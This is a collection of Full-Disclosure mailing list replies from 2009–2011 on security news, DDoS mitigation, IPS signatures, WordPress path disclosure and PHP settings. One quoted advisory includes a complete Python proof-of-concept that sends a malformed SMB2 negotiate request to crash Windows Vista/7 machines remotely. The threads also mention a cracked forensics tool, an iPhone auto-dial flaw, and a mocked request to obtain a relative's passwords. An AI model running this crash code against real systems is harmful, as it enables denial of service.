Re: [Full-disclosure] You a trollin'

2011-07-04 Thread James Matthews
Yes you are trolling...

On Mon, Jul 4, 2011 at 12:27 PM, t0hitsugu tohits...@gmail.com wrote:

 Am I right? ;D

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
http://www.theboxery.com


Re: [Full-disclosure] Sony: No firewall and no patches

2011-05-11 Thread James Matthews
Most security certifications are a mockery of the entire industry.

On Mon, May 9, 2011 at 7:33 PM, Ivan . ivan...@gmail.com wrote:

 I guess that makes a mockery of the PCI DSS framework!

 On Tue, May 10, 2011 at 9:03 AM, Thor (Hammer of God) 
 t...@hammerofgod.com wrote:

  Maybe they should call that You don't have to patch genius!  Lol


 http://www.eweek.com/c/a/Security/Sony-Networks-Lacked-Firewall-Ran-Obsolete-Software-Testimony-103450/


 Sent from my Windows Phone





-- 
http://www.goldwatches.com


Re: [Full-disclosure] Ubisoft DDoS

2010-03-09 Thread James Matthews
I don't see why they didn't just block the attack. It must be more than
this.

On Tue, Mar 9, 2010 at 8:21 AM, Dobbins, Roland rdobb...@arbor.net wrote:


 On Mar 9, 2010, at 11:01 PM, valdis.kletni...@vt.edu wrote:

  Oh, I didn't say they didn't exist.

 A good way to get started w/scalable DDoS mitigation is to implement S/RTBH
 on one's hardware-based edge routers, and then make use of open-source
 NetFlow tools for visibility.

 There are commercial solutions as well - in the interests of full
 disclosure (pardon the pun, heh), I work for a vendor of such intelligent
 DDoS mitigation (IDMS) solutions.

 These slides may be of interest in hardening/leveraging one's network
 infrastructure and gaining the ability to
  detect/classify/traceback/mitigate DDoS:

 http://files.me.com/roland.dobbins/k54qkv

 http://files.me.com/roland.dobbins/prguob

 http://files.me.com/roland.dobbins/k4zw3x

 http://files.me.com/roland.dobbins/dweagy

 There was also a relevant talk at the latest NANOG (a synopsis of
 discussions on nanog-l and cisco-nsp):

 
 http://www.nanog.org/meetings/nanog48/presentations/Monday/Kaeo_FilterTrend_ISPSec_N48.pdf
 

 and other relevant presentations at various NANOGs in the past.

 To answer the previous respondent's question, Cisco acquired Riverhead and
 its Guard in early 2004:

 
 http://www.cisco.com/en/US/prod/collateral/modules/ps2706/end_of_life_c51-573493.html
 

 I also highly recommend this book by Dave Smith and Gregg Schudel of Cisco
 - it's the best (and only!) book on real-world opsec out there, available in
 dead-tree, Kindle, and Adobe Reader formats:

 
 http://www.amazon.com/Router-Security-Strategies-Securing-Network/dp/1587053365/ref=sr_1_1?ie=UTF8&s=books&qid=1262667257&sr=8-1
 

 [Full disclosure again; I'm cited in the book, but received and continue to
 receive no remuneration of any kind due to same.]

 But before going the commercial route, folks should work on hardening their
 hosts/OSes/apps and leveraging their existing infrastructure and open-source
 as noted in the presentations above - in many cases, this is all that's
 needed, as outlined here:

 http://mailman.nanog.org/pipermail/nanog/2010-January/016747.html

 ---
 Roland Dobbins rdobb...@arbor.net // http://www.arbornetworks.com

Injustice is relatively easy to bear; what stings is justice.

-- H.L. Mencken







-- 
http://www.miami-criminallaw.com/practice-areas/cyber-crimes


Re: [Full-disclosure] Going underground, living out of backpack, etc?

2010-03-08 Thread James Matthews
I guess you can follow what he did http://amix.dk/blog/post/19493 . I just
want you to know that unless you leave the country it's going to be hard to
get off Big Brother's radar.

On Mon, Mar 8, 2010 at 12:40 AM, Anders Klixbull a...@experian.dk wrote:

 Learn how to blow old men and live on their couches



 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Simon
 Garfinkle
 Sent: 1 March 2010 05:50
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Going underground, living out of backpack,
 etc?


 Hello.

 I am interested in getting some advice from you security professionals
 (white hat and black hat) about going underground.

 I am sick of big brother, I love independence, I want to experience the
 world and have no commitments.

 I am just sick of being held down in one place. It's too easy for people
 to harass and stalk you.  You gotta be mobile. Fancy free and foot
 loose.

 You gotta be underground.

 Have any advice for living out of a bag? Any stories? Any lessons?





-- 
http://www.miami-criminallaw.com/practice-areas/cyber-crimes


Re: [Full-disclosure] Two MSIE 6.0/7.0 NULL pointer crashes

2010-01-20 Thread James Matthews
Why doesn't Microsoft throw some of its weight behind Mozilla and ditch IE
forever? It doesn't suit their image.

On Wed, Jan 20, 2010 at 6:30 AM, Christian Sciberras uuf6...@gmail.com wrote:

 On my IE6 this doesn't work (crash), but it does on IE7. I'm on WinXP Pro
 SP3 DEP+.





 On Wed, Jan 20, 2010 at 11:57 AM, Berend-Jan Wever 
 berendjanwe...@gmail.com wrote:

 Two NULL pointer crashes, they do not affect MSIE 8.0. Repros can be found
 here:

 http://skypher.com/index.php/2010/01/20/microsoft-internet-explorer-6-07-0-null-pointer-crashes/

 Cheers,
 SkyLined

 http://skypher.com/index.php/2010/01/20/microsoft-internet-explorer-6-07-0-null-pointer-crashes/
 Berend-Jan Wever berendjanwe...@gmail.com
 http://skypher.com/SkyLined






-- 
http://www.astorandblack.com


Re: [Full-disclosure] All China, All The Time

2010-01-14 Thread James Matthews
They used an IE exploit to get in. I don't understand Google said that they
used a complex way to access their systems. AFAIK many home users are hacked
daily the same way.



On Thu, Jan 14, 2010 at 7:44 PM, Ivan . ivan...@gmail.com wrote:

 Interesting article on zdnet, talking about the targeting of the
 lawful intercept system at Google

 …they [hackers] apparently were able to access a system used to help
 Google comply with search warrants by providing data on Google users,
 said a source familiar with the situation, who spoke on condition of
 anonymity because he was not authorized to speak with the press.
 “Right before Christmas, it was, ‘Holy s***, this malware is accessing
 the internal intercept [systems],’” he said.

 http://blogs.zdnet.com/Foremski/?p=1047

 2010/1/15 Michael Holstein michael.holst...@csuohio.edu:
 
  With all the hubbub around China yet again, I would like to remind you
 of the utilities available at Hammer of God that allow one to completely
 block any or all traffic to or from China or any other country in the world
 via ISA/TMG.
 
 
  Source for pre-built blocklists in DNSBL, CIDR, or Cisco ACL format :
 
  http://www.okean.com/thegoods.html
 
  Regards,
 
  Michael Holstein
  Cleveland State University
 
 




-- 
http://www.goldwatches.com


Re: [Full-disclosure] Security app

2010-01-05 Thread James Matthews
What I found to be very helpful was looking at the iPhone-dev team's
presentation about the jailbreak and then asking some questions in the chat
room.

On Tue, Jan 5, 2010 at 4:18 PM, Christian Sciberras uuf6...@gmail.com wrote:

 Depending on what you are aiming at.

 In general, I'd love to see an information listing app, of course of
 security-related information (connections, sensors...).


 On Tue, Jan 5, 2010 at 9:44 PM, Will McAfee 
 sec-commun...@thegoodhacker.com wrote:

 I am an iPhone app developer working on a security toolkit app.  My
 question is simple.  What would you find most useful in a security
 tool app?

 Sent from my iPhone





-- 
http://www.miami-criminallaw.com/practice-areas/cyber-crimes


Re: [Full-disclosure] The Game

2009-12-30 Thread James Matthews
We should make it an iPhone app. I lost the game as well a while ago...

On Thu, Dec 31, 2009 at 12:14 AM, Andrew Haninger ahan...@mindspring.com wrote:

 On Wed, Dec 30, 2009 at 8:48 AM, McGhee, Eddie eddie.mcg...@ncr.com
 wrote:
  Care to elaborate?
 NSFW - http://encyclopediadramatica.com/The_game

 Andy





-- 
http://www.miami-criminallaw.com/practice-areas/cyber-crimes


Re: [Full-disclosure] DECAF patched and re-enabled

2009-12-26 Thread James Matthews
No it's fluorescent

On Fri, Dec 25, 2009 at 11:25 AM, Christian Sciberras uuf6...@gmail.com wrote:

 Won't the bulb burn up turning it on and off repeatedly?

 Just kiddin'



 On Thu, Dec 24, 2009 at 7:16 PM, thediskprotec...@hush.com wrote:

 DECAF was disabled days ago by the authors at decafme.org.  It
 looks like some people over at soldierx.com have patched the binary
 to re-enable it and remove the phone home functionality.  The full
 story is at http://www.soldierx.com/news/DECAF-hacked-and-re-enabled-SX and
 the files are at
 http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or
 http://www.multiupload.com/88TEOEYCSZ





-- 
http://www.miami-criminallaw.com/practice-areas/cyber-crimes


Re: [Full-disclosure] DECAF patched and re-enabled 133-54D

2009-12-26 Thread James Matthews
On Sun, Dec 27, 2009 at 2:26 AM, James Matthews nytrok...@gmail.com wrote:

 No it's fluorescent

 On Fri, Dec 25, 2009 at 11:25 AM, Christian Sciberras 
 uuf6...@gmail.com wrote:

 Won't the bulb burn up turning it on and off repeatedly?

 Just kiddin'



 On Thu, Dec 24, 2009 at 7:16 PM, thediskprotec...@hush.com wrote:

 DECAF was disabled days ago by the authors at decafme.org.  It
 looks like some people over at soldierx.com have patched the binary
 to re-enable it and remove the phone home functionality.  The full
 story is at http://www.soldierx.com/news/DECAF-hacked-and-re-enabled-SX and
 the files are at
 http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or
 http://www.multiupload.com/88TEOEYCSZ





 --
 http://www.miami-criminallaw.com/practice-areas/cyber-crimes

 --








-- 
http://www.goldwatches.com


Re: [Full-disclosure] Software developer looks at CRU code

2009-11-29 Thread James Matthews
This is sad and I feel bad that people have been sold on these ideas.

On Sun, Nov 29, 2009 at 5:28 PM, Ivan . ivan...@gmail.com wrote:

 http://www.youtube.com/watch?v=sYxk7pnmMFw&feature=related





-- 
http://www.goldwatches.com


Re: [Full-disclosure] Attack pattern selection criteria for IPS products

2009-10-11 Thread James Matthews
Yes they do all look at the same common holes and flag them but as for
detection everyone has a different method.

On Fri, Oct 9, 2009 at 1:16 PM, Rohit Patnaik quanti...@gmail.com wrote:

 Why would Cisco, Juniper, etc. maintain the signature sets?
 Presumably, each company maintains its own set of allow/deny rules.

 --Rohit Patnaik

 2009/10/9 srujan sruja...@gmail.com:
  I agree with your word "let customer network admin selects it". But
  Tipping Point, Juniper, Cisco and Snort will have a wide range of customers,
  and maintaining different signature set for different Orgs is a big
  headache.
 
  All these guys are maintaining 95% to 99% detection coverage at NSS
  testing. That's why I asked about the selection criteria.
 
  On Fri, Oct 9, 2009 at 1:36 AM, valdis.kletni...@vt.edu wrote:
 
  On Fri, 09 Oct 2009 00:47:24 +0530, srujan said:
 
   What is the vulnerability selection criteria of Tipping Point, Juniper IPS
   products.
 
   Is it covering each and every CVE ID or is it selecting particular kind of
   attacks. If so what is selection criteria (cvss score or severity level or
   most publicly exploited)
 
  If the answer isn't "customer network admin selects it", the products are
  broken and brain damaged.  Different sites have different security stances,
  and different opinions regarding the trade-off between the added security
  benefit and the throughput and latency hits you take.
 
  Even within a site, the trade-offs may vary.  I have some machines that
  are actually air-gapped, some that are heavily firewalled, and some that
  are lightly firewalled - and there's probably some Snort sensors and
  honeypots too.. ;)
 
  If you're asking for what pre-canned detection rules they come with, it's
  probably all the known vulns that we can figure out how to write a Snort
  rule that doesn't suck resources. :)
 
  OK, maybe they don't use Snort - but the same problems of filter
  expressiveness, whether/how to do a regexp, and so on, are faced by all
  IDS/IPS systems.  If you need to do a regexp backref, it's going to either
  not be part of the available toolset, or it's going to suck at line rate on
  high speed interfaces.  Matching
  '\((134|934){3,5})\(foo|bar)(more ugly)(\1|\2)' is going to suck whether
  it's Snort or silicon.
 
 
 




-- 
http://www.goldwatches.com

Re: [Full-disclosure] When is it valid to claim that a vulnerability leads to a remote attack?

2009-10-11 Thread James Matthews
If you classify a remote bug (anything that can be exploited remotely) then
you are classifying all bugs (you can use a privilege escalation exploit
remotely). I agree with Thor, anything that exploits a remote service
(HTTP, FTP, etc.) without any user interaction.

On Sun, Oct 11, 2009 at 12:54 AM, Thor (Hammer of God) t...@hammerofgod.com
 wrote:



  I think we can agree that yes, it is remotely exploitable and as such
  should be categorized as remote in Risk/Impact scoring systems ?
 
  Does anybody disagree ? I'd be interested to hear your point of view.

 Hey Thierry - I hope all is well...

 I'm happy to include user assisted remote exploitation as a remote
 vulnerability in academic conversations, but I don't categorize it as
 remote when assessing overall risk to a particular threat in production
 environments.  Like everyone else, my TMs include impact and skill required
 to exploit a particular vulnerability; but they also include likelihood of
 exploitation.   While that may sound like a wildcard metric, I quantify it
 by applying the internal controls in place that may mitigate a particular
 attack.  In my networks (networks I control, design, or consult for) most
 users couldn't execute [common] exploits even if they wanted to.  I won't
 bore you with the controls I deploy as I'm confident you are well aware of
 the options one has, but the fact they exist at all places user assisted
 remote exploits in a different category for me when assessing risk.  When
 the propensity for a vulnerability to be exploited lies in a particular
 user's response to any given trigger, as opposed to any authoritative
 in-place controls to mitigate exposure, then a model's relevant response
 options are greatly diminished (IMO).

 As such, I choose to categorize remote exploits as those that may be
 executed against a given host that is autonomously running a [vulnerable]
 service that can be connected to by some (any) other network client, device,
 or service for the purposes of ascertaining overall risk.

 t





-- 
http://www.goldwatches.com

Re: [Full-disclosure] Full Path Disclosure in most wordpress' plugins [?]

2009-09-30 Thread James Matthews
Some shared hosting services try very hard (and do quite well with what they
have). When you get into VPS systems it gets complex but dedicated is a nice
way to go.

James

On Wed, Sep 30, 2009 at 3:57 AM, Glafkos Charalambous
i...@infosec.org.uk wrote:

  Hello,



 Most of the people are using shared hosting environment and not all of them
 are about security and/or having their own (dedicated) server. You have to
 see it from the whole perspective and that this is *not always* an option.

 I don't remember this post was about secure environments or how to have a
 secure website rather than the issue of wordpress plugins and how people are
 affected (using shared hosting or not)



 Btw what  part of *most of the times*  didn't make sense in the previous
 post?



 Glafkos





 *From:* majinboo [mailto:majin...@gmail.com]
 *Sent:* Wednesday, September 30, 2009 9:35 AM
 *To:* Glafkos Charalambous
 *Cc:* Peter Bruderer; full-disclosure@lists.grok.org.uk

 *Subject:* Re: [Full-disclosure] Full Path Disclosure in most wordpress'
 plugins [?]



 Hello,

 shared hosting environment is not an option if you want to have a secure
 website.

 majinboo

 2009/9/29 Glafkos Charalambous i...@infosec.org.uk

 Hello,

 Yes at some point you are right but this is not an option most of the
 times,
 especially when you are on a shared hosting environment.

 So either the developers need to secure their plugins or we do it ourselves
 as this is still an issue for everybody using Wordpress Plugins.

 Glafkos


 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk

 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Peter
 Bruderer
 Sent: Tuesday, September 29, 2009 9:33 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] Full Path Disclosure in most wordpress'
 plugins [?]

 The proposed fix is definitely something that helps. But to me it
 looks like most people do not care anymore about server settings. As
 soon as it is kind of working, it is pushed to the Internet.

 Why not avoid these problems completely and follow the recommendations
 in php.ini?

 ; Print out errors (as a part of the output).  For production web sites,
 ; you're strongly encouraged to turn this feature off, and use error logging
 ; instead (see below).  Keeping display_errors enabled on a production web site
 ; may reveal security information to end users, such as file paths on your Web
 ; server, your database schema or other information.
 ;
 ; possible values for display_errors:
 ;
 ; Off - Do not display any errors
 ; stderr - Display errors to STDERR (affects only CGI/CLI binaries!)
 ; stdout (On) - Display errors to STDOUT
 ;
 display_errors = Off

 ; Even when display_errors is on, errors that occur during PHP's startup
 ; sequence are not displayed.  It's strongly recommended to keep
 ; display_startup_errors off, except for when debugging.
 display_startup_errors = Off

 ; Log errors into a log file (server-specific log, stderr, or error_log (below))
 ; As stated above, you're strongly advised to use error logging in place of
 ; error displaying on production web sites.
 log_errors = On


 Now the error message is in the logfile and nothing is displayed in
 the browser.


 Peter Bruderer
 --
   Bruderer Research GmbH
   CH-8200 Schaffhausen





 On 29.09.2009, at 18:31, Loaden wrote:

  Hey
 
  At first, excuse my bad English. That's a nice fix. But you need to change
  the code for other plugins or files. This code works for all files which
  should not be loaded directly:
 
  if (basename($_SERVER['SCRIPT_NAME']) == basename(__FILE__))
      exit('Please do not load this page directly');
 
  If your webhoster doesn't have a configuration panel you can try to
  disable errors with this in your index.php:
 
  ini_set('display_errors', 0);
 
  I'm not sure if it works if safe mode is activated. Try it or look at
  the PHP manual.
 
  Regards
 
  Loaden
 
  On Mo, 2009-09-28 at 23:37 +0300, Glafkos Charalambous wrote:
  Hello,
 
 
 
  That definitely can be fixed easily with two lines of code but is
  still something that should have been prevented at earlier stages of
  plugin development
 
 
 
  if (!empty($_SERVER['SCRIPT_FILENAME']) && 'akismet.php' ==
      basename($_SERVER['SCRIPT_FILENAME']))
      die ('Please do not load this page directly');
 
 
 
  From the server side you can set PHP warning and errors OFF either
  through php.ini or PHP page itself but sometimes that's not an option
 
 
 
  Regards,
 
  Glafkos Charalambous
 
 


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
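
The two mitigations discussed in this thread (the php.ini error settings and a direct-load guard at the top of each plugin file) can be checked mechanically. The following audit script is an added example, not code from any poster or from WordPress; the function names and sample inputs are constructed for illustration, and the `ABSPATH` pattern is a common WordPress idiom that the thread itself does not mention.

```python
import re

# Production values recommended by the php.ini excerpt quoted in the thread.
RECOMMENDED = {
    "display_errors": False,
    "display_startup_errors": False,
    "log_errors": True,
}

# php.ini spellings that enable a boolean directive; display_errors also
# accepts "stdout" and "stderr", both of which still emit the message.
_ENABLED = {"1", "on", "true", "yes", "stdout", "stderr"}


def parse_ini(text):
    """Return {directive: raw value}; a later assignment overrides an earlier one."""
    values = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()        # drop ';' comments
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        values[key.strip()] = value.strip().strip("\"'")
    return values


def audit_ini(text):
    """List (directive, found, wanted) for every setting that deviates."""
    values = parse_ini(text)
    findings = []
    for name, wanted in RECOMMENDED.items():
        if name not in values:
            findings.append((name, "unset", wanted))  # do not rely on defaults
        elif (values[name].lower() in _ENABLED) != wanted:
            findings.append((name, values[name], wanted))
    return findings


# A guard tests how the file was reached, then stops execution.
_GUARD_TEST = re.compile(
    r"basename\s*\(\s*\$_SERVER\s*\[\s*['\"]SCRIPT_(?:FILE)?NAME['\"]\s*\]\s*\)"
    r"|defined\s*\(\s*['\"]ABSPATH['\"]\s*\)"
)
_GUARD_STOP = re.compile(r"\b(?:exit|die)\b")


def has_direct_load_guard(php_source, head_lines=30):
    """Heuristic: the first lines test how the file was loaded, then exit/die."""
    head = "\n".join(php_source.splitlines()[:head_lines])
    test = _GUARD_TEST.search(head)
    return bool(test and _GUARD_STOP.search(head, test.end()))


# Constructed sample inputs.
WEAK_INI = """\
; constructed sample: development settings left on a production host
display_errors = On
display_startup_errors = On
"""
HARDENED_INI = """\
display_errors = Off
display_startup_errors = Off
log_errors = On
"""
UNGUARDED_PLUGIN = """<?php
/* Plugin Name: Example (constructed) */
add_action('init', 'example_init');
"""
GUARDED_PLUGIN = """<?php
if (basename($_SERVER['SCRIPT_NAME']) == basename(__FILE__))
    exit('Please do not load this page directly');
add_action('init', 'example_init');
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, "php.ini findings:", audit_ini(ini))
    for label, src in (("unguarded", UNGUARDED_PLUGIN), ("guarded", GUARDED_PLUGIN)):
        print(label, "plugin has guard:", has_direct_load_guard(src))
```

The guard check is a pattern match on the file head, so a hit means a guard is probably present, not that it is correct; the php.ini audit is the stronger control because it covers every script on the host.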

 

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-09 Thread James Matthews
So Msoft! Why can't they just stop reintroducing bugs?

On Wed, Sep 9, 2009 at 11:04 AM, random...@hushmail.com wrote:


 How come all I hear about is n3td3v, and I see no one crying out
 loud about this:
 http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&task=show&action=view&id=64&Itemid=15

 is fd all 'bout trolls nao?

 - --
 =
 - - Release date: September 7th, 2009
 - - Discovered by: Laurent Gaffié
 - - Severity: Medium/High
 =

 I. VULNERABILITY
 - -
 Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

 II. BACKGROUND
 - -
 Windows Vista and newer Windows versions come with a new SMB version named
 SMB2.
 See:
 http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
 for more details.

 III. DESCRIPTION
 - -
 SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
 PROTOCOL REQUEST functionality.
 The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends
 to a SMB server, and it's used
 to identify the SMB dialect that will be used for further
 communication.

 IV. PROOF OF CONCEPT
 - -

 Smb-Bsod.py:

 #!/usr/bin/python
 # When SMB2.0 recieve a  char in the Process Id High SMB
 header field it dies with a
 # PAGE_FAULT_IN_NONPAGED_AREA

 from socket import socket
 from time import sleep

 host = IP_ADDR, 445
 buff = (
 \x00\x00\x00\x90 # Begin SMB header: Session message
 \xff\x53\x4d\x42 # Server Component: SMB
 \x72\x00\x00\x00 # Negociate Protocol
 \x00\x18\x53\xc8 # Operation 0x18  sub 0xc853
 \x00\x26# Process ID High: -- :) normal value should be
 \x00\x00
 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
 \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
 \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
 \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
 \x30\x30\x32\x00
 )
 s = socket()
 s.connect(host)
 s.send(buff)
 s.close()

 V. BUSINESS IMPACT
 - -
 An attacker can remotely crash, without any user interaction, any
 Vista/Windows 7 machine with SMB enabled.
 Windows XP, 2k, are NOT affected as they don't have this driver.

 VI. SYSTEMS AFFECTED
 - -
 Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
 Win Server 2008
 as it uses the same SMB2.0 driver (not tested).

 VII. SOLUTION
 - -
 Vendor contacted, but no patch available for the moment.
 Close SMB feature and ports, until a patch is provided.

 VIII. REFERENCES
 - -
 http://microsoft.com

 IX. CREDITS
 - -
 This vulnerability has been discovered by Laurent Gaffié
 Laurent.gaffie{remove-this}(at)gmail.com
 http://g-laurent.blogspot.com/

 X. LEGAL NOTICES
 - -
 The information contained within this advisory is supplied as-is
 with no warranties or guarantees of fitness of use or otherwise.
 I accept no responsibility for any damage caused by the use or
 misuse of this information.





-- 
http://www.jewelerslounge.com
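
The quoted advisory singles out one header field: Process ID High in an SMB NEGOTIATE PROTOCOL REQUEST, which it says should normally be `\x00\x00`. The following detection check for that field is an added example, not part of the advisory or of any poster's code; the function names are hypothetical, the offsets follow the 32-byte SMB1 header layout, and the sample inputs are constructed header-only fragments rather than complete requests.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
SMB1_HEADER_LEN = 32
# Offset of PIDHigh inside the SMB1 header:
# protocol(4) + command(1) + status(4) + flags(1) + flags2(2) = 12
PID_HIGH_OFFSET = 12

# SMB1 header layout, little-endian, no padding (32 bytes in total).
_HEADER_FMT = "<4sBIBHH8sHHHHH"


def inspect_negotiate(segment):
    """Classify one TCP/445 payload and return (verdict, pid_high).

    Verdicts: 'not-session-message', 'not-smb1', 'truncated',
    'other-command', 'ok', 'suspicious'.
    """
    # 4-byte transport prefix: message type 0x00 followed by a 3-byte length.
    if len(segment) < 4 or segment[0] != 0x00:
        return ("not-session-message", None)
    body = segment[4:]
    if body[:4] != SMB1_MAGIC:
        return ("not-smb1", None)
    if len(body) < SMB1_HEADER_LEN:
        return ("truncated", None)
    if body[4] != SMB_COM_NEGOTIATE:
        return ("other-command", None)
    (pid_high,) = struct.unpack_from("<H", body, PID_HIGH_OFFSET)
    # The advisory states the normal value of this field is zero.
    return ("suspicious" if pid_high else "ok", pid_high)


def flag_payloads(payloads):
    """Return the indexes of payloads whose negotiate header looks anomalous."""
    return [i for i, p in enumerate(payloads)
            if inspect_negotiate(p)[0] == "suspicious"]


def sample_header(pid_high, command=SMB_COM_NEGOTIATE):
    """Constructed test input: transport prefix plus a bare SMB1 header.

    It carries no parameter or data block, so it is only useful for
    exercising the header check above.
    """
    header = struct.pack(
        _HEADER_FMT,
        SMB1_MAGIC, command,
        0,              # status
        0x18, 0xC853,   # flags, flags2
        pid_high,
        b"\x00" * 8,    # security features
        0, 0, 0, 0, 0,  # reserved, TID, PIDLow, UID, MID
    )
    return b"\x00" + len(header).to_bytes(3, "big") + header


if __name__ == "__main__":
    captured = [
        sample_header(0),                 # ordinary negotiate header
        sample_header(1),                 # non-zero PIDHigh
        sample_header(0, command=0x73),   # different SMB command
        b"\x00\x00\x00\x04abcd",          # not SMB1 at all
    ]
    for i, payload in enumerate(captured):
        print(i, inspect_negotiate(payload))
    print("flagged:", flag_payloads(captured))
```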

Re: [Full-disclosure] nmap

2009-07-30 Thread James Matthews
Nmap is written in C and C++ and the GUI has python bindings.

2009/7/30 Sándor Levente zer...@gmail.com

 hey list!
 i have a simple question: if nmap is python-based, why can't it be
 downloaded in python but c++?  maybe lame question but the only
 programming language i know is python.

 thanks!





-- 
http://www.goldwatches.com
http://www.jewelerslounge.com

Re: [Full-disclosure] (no subject)

2009-07-01 Thread James Matthews
LAMO! This is amazing! It made my day! You stupid stalker get a life and
stay away from women!

James

On Wed, Jul 1, 2009 at 3:06 PM, Inbox (Main) rokade...@gmail.com wrote:


 Why not just ask michelle?

 Hope you don't mind: I forwarded your mail to michelle.nash2...@yahoo.com


 2009/7/1 mitch nash mtchn...@yahoo.com

 would like passwords for e mail, facebook, and my space for
 michelle.nash2...@yahoo.com, and my space passwords for marlee_michelle.
 (x wife and daughter) thank you, mitch nash





-- 
http://www.goldwatches.com

Re: [Full-disclosure] lostzero has invited you to Spokeo

2009-06-20 Thread James Matthews
Stalker. One of the sites that helps you spy on people around you through
social networks etc...

On Sun, Jun 21, 2009 at 12:46 AM, lostz...@gmail.com wrote:

 Hi full-disclosure,

 lostz...@gmail.com has invited you to try Spokeo,
 which finds your friends' updates across the Web.

 Your friends are already using Spokeo to follow you on Web Results.
 Try Spokeo today to find what your friends are doing across 30 different
 social networks!

 Click here to accept your invitation:
 http://www.spokeo.com/public/join?c=7625472e72f41c3a7ac7326ddeefceab570c6662


 --
  This invitation was sent with lostzero's approval.
 If you wish to opt out of all future emails, click here:
 http://www.spokeo.com/optout?c=f495048575348535649


 Copyright © 2009 Spokeo, Inc. All rights reserved.
 1685 Plymouth Street #200, Mountain View, CA 94043




-- 
http://www.goldwatches.com

http://www.jewelerslounge.com

Re: [Full-disclosure] iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)

2009-06-18 Thread James Matthews
Bug or feature (an old, common argument within the software world); however, I
don't think that automatic dialing is what I want when I am browsing a page.
I would like a choice, not for it to be done automatically.

On Thu, Jun 18, 2009 at 8:29 PM, Collin Mulliner col...@betaversion.net wrote:

 Mike,

 just getting to the phone dialer is not a bug! That is what the tel:
 protocol is for. Almost all mobile phones implement this; every time
 you open a tel: URL you will get to the dialer in some way.

 Collin

 Mike Ely wrote:
  Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was
 wondering why my phone stepped on email to dial out when I read this email
 and then I read the subject line ;)
 
  FWIW, it didn't actually dial, just loaded the dialer with that number
 ready.
 
  Looks like this is a Webkit bug, not Safari.
 
  Collin Mulliner col...@betaversion.net wrote:
 
  Released since Apple published the iPhone 3.0 security fixes.
 
  Vulnerability Report
 
  --- BEGIN ADVISORY ---
 
  Manufacturer: Apple (www.apple.com)
  Device:   iPhone 3G (iPhone 1st Gen)
  Firmware: 2.1 (possible earlier versions)
  Device Type:  smart phone
 
  Subsystems: Safari (and mobile telephony)
 
  -
 
  Short name:
iPhone Safari phone-auto-dial (vulnerability)
 
  Vulnerability class:
application logic bug
 
  Executive Summary:
A malicious website can initiate a phone call without the need of user
interaction. The destination phone number is chosen by the attacker.
 
  Risk: MEDIUM-HIGH
Medium to high risk due to the possibility of financial gain through
this attack by calling of premium rate numbers (e.g. 1-900 in the
U.S.). Denial-of-service against arbitrary phone numbers through
mass-calling. User cannot prevent attack.
 
  -
 
  Reporter: Collin Mulliner collin[AT]mulliner.org
 
  -
 
  Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
 
  -
 
  Time line:
 
Oct. 20. 2008: Reported vulnerability to vendor.
Oct. 20. 2008: Vendor acknowledges receiving our email.
   Not commenting on the vulnerability itself.
Oct. 27. 2008: Sent update to vendor, also requesting a status report.
Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
Oct. 30. 2008: Sent additional information.
Nov. 13. 2008: Vendor says vulnerability is fixed in upcoming OS
   version.
Nov. 20. 2008: Public disclosure.
Jun. 18. 2009: Full-Disclosure.
 
  -
 
  Fix:
 
iPhone OS 2.2
iPhone OS 2.2.1
iPhone OS 3.0
 
  -
 
  Technical Details:
 
The Safari version running on the iPhone supports handling the TEL [1]
protocol through launching the telephony/dialer application. This is
done by passing the provided phone number to the telephony
application. Under normal conditions, loading a tel: URI results in a
message box asking the user's permission to call the given number. The
user is presented with the simple choice to either press call or
cancel.
 
A TEL URI can be opened automatically if the TEL URI is used as the
source of an HTML iframe or frame, as the URL of a meta refresh, as
the location of a HTTP 30X redirect, and as the location of the
current or a new window using javascript.
 
We discovered a security vulnerability that dismisses the ask for
permission to call dialog in a way that chooses the call option
rather than the cancel option.
 
This condition occurs if a TEL URI is activated at the same time
Safari is closed by launching an external application, for example
launching the SMS application (in order to handle a SMS URI [2]). The
SMS application can be launched through placing a SMS URI as the
